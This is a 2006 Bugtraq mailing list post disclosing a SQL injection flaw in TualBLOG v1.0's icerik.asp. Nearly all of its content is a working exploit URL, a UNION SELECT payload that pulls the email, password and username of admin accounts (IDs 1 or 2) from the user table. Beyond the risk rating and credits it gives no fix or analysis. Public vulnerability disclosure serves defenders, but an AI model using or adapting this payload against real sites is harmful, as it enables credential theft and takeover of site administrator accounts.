Bugtraq mailing list archives

TualBLOG v 1.0 multiple sql injection

From: dj_remix_20 () hotmail com
Date: 13 Sep 2006 14:04:38 -0000

# BiyoSecurity.Org

# script name : TualBLOG v 1.0 

# Risk : High

# Regards : Dj ReMix

# Thanks : Korsan , Liz0zim

# Vulnerable file : icerik.asp

exp :

http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1


uyeno = 1 or 2( Admin ID )

Bye :=)

Current thread:

TualBLOG v 1.0 multiple sql injection dj_remix_20 (Sep 13)